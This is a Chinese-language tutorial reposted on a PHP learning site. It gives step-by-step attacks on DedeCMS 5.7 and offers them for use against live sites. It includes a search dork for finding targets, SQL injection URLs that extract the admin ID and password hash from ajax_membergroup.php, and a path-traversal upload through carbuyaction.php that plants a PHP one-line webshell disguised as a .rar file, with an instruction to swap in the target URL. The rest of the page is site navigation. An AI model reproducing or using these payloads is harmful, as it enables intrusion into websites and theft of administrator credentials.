简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW)
Home > Database > Mysql Tutorial > body text

dedecms5.7最新注入和上传漏洞

WBOY
Release: 2016-06-07 18:08:05
Original
2972 people have browsed it

漏洞描述:百度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">
file:

newname:
提交

 

把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。


Related labels:
upload up to date injection loopholes Hundred
source:php.cn
Previous article:使用BAK文件还原SQL2000出错的原因 Next article:mysql(10061)报错临时解决办法
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
function_exists() cannot determine the custom function Function test () {return true;} if (function_exists ('test')) {echo "test is function...
From 2024-04-29 11:01:01
0
1
490
How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?
From 2024-04-23 00:22:19
0
6
569
The child window operates the parent window, but the output does not respond. The first two sentences are executable, but the last sentence cannot be implemented.
From 2024-04-19 15:37:47
0
1
543
There is no output in the parent window document.onclick = function(){ window.opener.document.write('I am the output of the child ...
From 2024-04-18 23:52:34
0
0
410
Where is the courseware about CSS mind mapping? Courseware
From 2024-04-16 10:10:18
0
0
519
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!